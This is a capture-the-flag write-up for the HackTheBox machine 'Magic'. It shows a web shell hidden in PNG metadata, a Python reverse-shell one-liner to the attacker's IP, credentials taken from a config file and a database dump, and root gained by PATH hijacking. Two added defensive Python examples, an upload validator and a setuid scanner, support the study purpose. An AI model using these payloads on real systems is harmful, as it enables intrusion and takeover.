HackTheBox — Magic
Summary
Magic is a medium-rated machine with IP 10.10.10.185.
Enumeration
Nmap
Web Browsing
Port 80
I found a login page, so I thought of using SQL injection.
It redirected me to the upload.php page.
I tried to upload a PHP file, but I got an error.
I decided to inject the payload into a PNG image using exiftool.
root@strike:~# exiftool -Comment='<?php system($_GET["cmd"]); ?>' test.php.png
1 image files updated
root@strike:~#
After uploading, I went to the uploads directory and tried to execute commands.
And it worked. After that I tried to get a reverse shell.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",4142));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Got it
root@strike:~# nc -lvp 4142
listening on [any] 4142 ...
10.10.10.185: inverse host lookup failed: Unknown host
connect to [10.10.14.55] from (UNKNOWN) [10.10.10.185] 47278
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/var/www/Magic/images/uploads$
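The upload step above got through because the name test.php.png still contains a .php segment and the PHP code rides in a PNG metadata comment. The following Python validator is an added example and not code from the write-up or from the box's upload.php; it shows the server-side checks that stop both tricks: exactly one extension from an allow-list, leading bytes that match the declared type, and no PHP open tag anywhere in the file bytes (metadata included). The sample PNG bytes, the ALLOWED_TYPES table and the function name validate_upload are constructed for this example.

```python
import re
import struct
import zlib
from typing import Tuple

# Constructed samples (not files from the write-up): a 1x1 PNG with and
# without a tEXt chunk carrying a PHP open tag, the place exiftool's
# -Comment option writes to.
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
JPEG_SIGNATURE = b"\xff\xd8\xff"


def _png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Build one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


_IHDR = _png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
CLEAN_PNG = PNG_SIGNATURE + _IHDR + _png_chunk(b"IEND", b"")
TAINTED_PNG = (PNG_SIGNATURE + _IHDR
               + _png_chunk(b"tEXt", b"Comment\x00<?php /* constructed marker */ ?>")
               + _png_chunk(b"IEND", b""))

# Allow-list of image types: last extension -> expected leading bytes.
ALLOWED_TYPES = {"png": PNG_SIGNATURE, "jpg": JPEG_SIGNATURE, "jpeg": JPEG_SIGNATURE}
# PHP open tags; a hit anywhere in the bytes (metadata included) is a reject.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Accept only single-extension image names whose bytes match the declared
    type and contain no PHP open tag. Returns (accepted, reason)."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    # "test.php.png" has two extensions; a server that hands any ".php" segment
    # to the PHP handler would execute it, so require exactly one extension.
    if len(parts) != 2 or not parts[0]:
        return False, "filename must be <name>.<ext> with exactly one extension"
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} is not an allowed image type"
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "file content does not match the declared image type"
    if PHP_OPEN_TAG.search(data):
        return False, "PHP open tag found inside image data (metadata injection)"
    return True, "ok"


if __name__ == "__main__":
    for name, blob in [("test.php.png", CLEAN_PNG), ("photo.png", TAINTED_PNG),
                       ("photo.png", CLEAN_PNG)]:
        print(name, validate_upload(name, blob))
```

The tag scan is a last line of defence, not the fix: uploads should be stored where the web server never executes scripts, and images should be re-encoded on the way in so metadata such as the Comment field is dropped entirely.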
Let's enumerate as this user.
www-data@ubuntu:/var/www/Magic$ ls
ls
1 db.php5 index.php logout.php upload.php
assets images login.php magic.sql
Let's take a look at db.php5.
www-data@ubuntu:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';
    private static $cont = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}
Now we have new credentials, but I can't switch to this user with them.
I decided to dump the whole database.
www-data@ubuntu:/tmp$ mysqldump Magic -u theseus -p
mysqldump Magic -u theseus -p
Enter password: iamkingtheseus
-- MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost Database: Magic
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1
...
--
-- Dumping data for table `login`
--
LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
...
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2020-08-18 10:22:14
I got a password from the database. Let's switch to this user.
www-data@ubuntu:/var/www/Magic$ su - theseus
su - theseus
Password: Th3s3usW4sK1ng
theseus@ubuntu:~$
Got the user flag!
Privilege Escalation
SUID Binaries
theseus@ubuntu:~$ find / -perm -u=s 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
.....
.....
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
Take a look at /bin/sysinfo.
theseus@ubuntu:~$ strings /bin/sysinfo
/lib64/ld-linux-x86-64.so.2
libstdc++.so.6
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
.....
.....
popen() failed!
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================
free -h
Path Injection
I created an executable named lshw in /tmp and added /tmp to the PATH environment variable
theseus@ubuntu:/tmp$ cat lshw
/bin/bash 1>&0 2>&0
theseus@ubuntu:/tmp$ chmod +x lshw
theseus@ubuntu:/tmp$ ls -al lshw
-rwxrwxr-x 1 theseus theseus 20 Aug 18 16:32 lshw
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
Run /bin/sysinfo
theseus@ubuntu:/tmp$ /bin/sysinfo
====================Hardware Info====================
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls
info.c root.txt
root@ubuntu:/root#
Got the root flag!
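The privilege escalation works because a setuid root binary runs commands such as lshw -short through popen() by bare name, so whatever PATH the caller controls decides which lshw executes. The scanner below is an added example, not a tool from the write-up: it automates what the strings /bin/sysinfo step showed by walking the filesystem for setuid files and flagging printable strings that look like a command invoked without an absolute path and that resolve on a fixed system PATH. The SAMPLE_BINARY blob is constructed to mimic the strings output on this page; the function names, SEARCH_PATH and the heuristics are assumptions of the example.

```python
import os
import re
import shutil
import stat
from typing import Dict, Iterable, List, Optional, Set

# Where a legitimate command should resolve; a trusted setuid program
# should reset PATH to something like this (or use absolute paths) itself.
SEARCH_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"

# "cmd args..." where cmd is a bare name (no slash, no shell metacharacters).
CMD_RE = re.compile(r"^([A-Za-z][A-Za-z0-9_.-]*)(\s+\S.*)?$")


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Same idea as the strings(1) utility: runs of printable ASCII."""
    pattern = (r"[\x20-\x7e]{%d,}" % min_len).encode()
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def relative_commands(strings: Iterable[str], known: Optional[Set[str]] = None) -> List[str]:
    """Return strings that look like a command run by bare name, where that
    name exists on SEARCH_PATH (or is in `known`, used for offline tests)."""
    hits = []
    for s in strings:
        s = s.strip()
        m = CMD_RE.match(s)
        if not m:
            continue
        cmd = m.group(1)
        resolves = cmd in known if known is not None else shutil.which(cmd, path=SEARCH_PATH) is not None
        if resolves:
            hits.append(s)
    return hits


def scan_suid_binaries(root: str = "/", known: Optional[Set[str]] = None) -> Dict[str, List[str]]:
    """Walk `root`, read every setuid regular file, and report suspicious strings."""
    findings: Dict[str, List[str]] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not (st.st_mode & stat.S_ISUID):
                continue
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            hits = relative_commands(extract_strings(data), known)
            if hits:
                findings[path] = hits
    return findings


# Constructed sample modelled on the strings output of /bin/sysinfo above;
# this is not the real binary.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"/lib64/ld-linux-x86-64.so.2\x00libstdc++.so.6\x00"
    + b"popen() failed!\x00"
    + b"====================Hardware Info====================\x00"
    + b"lshw -short\x00fdisk -l\x00cat /proc/cpuinfo\x00free -h\x00"
)

if __name__ == "__main__":
    for path, hits in scan_suid_binaries("/", known=None).items():
        print(path)
        for h in hits:
            print("   ", h)
```

Expect manual review of the output: a string such as "test" or "time" matches a real command name and will be reported even when it is only a message. The fix on the binary side is the mirror image of the finding: call helpers by absolute path and reset PATH (or drop the shell and use execve) before running anything as root.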
If you learned anything useful from this write-up, respect me on HackTheBox.
Thanks for your time!